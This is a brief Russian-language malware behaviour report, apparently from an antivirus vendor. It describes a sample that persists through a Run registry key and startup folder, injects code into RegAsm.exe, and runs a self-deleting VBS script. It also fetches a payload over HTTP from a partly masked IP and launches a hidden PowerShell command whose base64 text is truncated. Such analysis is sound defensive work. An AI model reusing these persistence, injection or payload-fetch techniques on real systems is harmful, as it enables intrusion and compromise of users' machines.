Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'RegAsm' = '%APPDATA%\RegAsm.exe'
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\regasm.exe
Вредоносные функции
Внедряет код в
следующие системные процессы:
- %WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\ixp000.tmp\6908a8c3b0066.vbs
- %APPDATA%\regasm.exe
Удаляет файлы, которые сам же создал
- %TEMP%\ixp000.tmp\6908a8c3b0066.vbs
Сетевая активность
Подключается к
- '62.##.226.168':80
- '19#.#17.98.110':7000
TCP
Запросы HTTP GET
- http://62.##.226.168/public_files/ukUfuCQ.txt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\IXP000.TMP\6908a8c3b0066.vbs"
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c 6908a8c3b0066.vbs (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "$ddsdgo ='WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAH... (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
